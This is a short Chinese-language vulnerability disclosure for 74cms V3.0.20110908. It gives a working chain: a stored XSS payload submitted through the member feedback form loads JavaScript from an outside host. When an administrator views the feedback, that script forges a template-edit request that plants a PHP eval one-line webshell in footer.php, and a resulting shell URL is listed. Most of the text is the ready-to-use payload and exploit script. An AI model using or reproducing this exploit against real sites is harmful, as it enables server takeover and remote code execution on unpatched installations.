骑士CMS(74cms) CSRF 后台 getshell
官方网站:http://www.74cms.com/
影响版本:74cms V3.0.20110908
Author:insight
漏洞详细:
注册用户-->会员中心-->意见建议-->提交意见内容1">1<script src="http://nophack.tk/x.js"></script>1 --> 等待管理员登录
管理员登录-->查看"待回复的意见/建议" --> .....
js内容:
var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6'; try{ var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); xml.open("POST",'admin_templates.php?act=do_edit',false); xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xml.onreadystatechange = function(){if(xml.readyState == 4){}}; xml.send(Shelldata); }catch(e){}
shell地址:http://www.hack1990.com /74cmsv3/templates/default/footer.php
上一篇:友言存在注入与文件路径泄露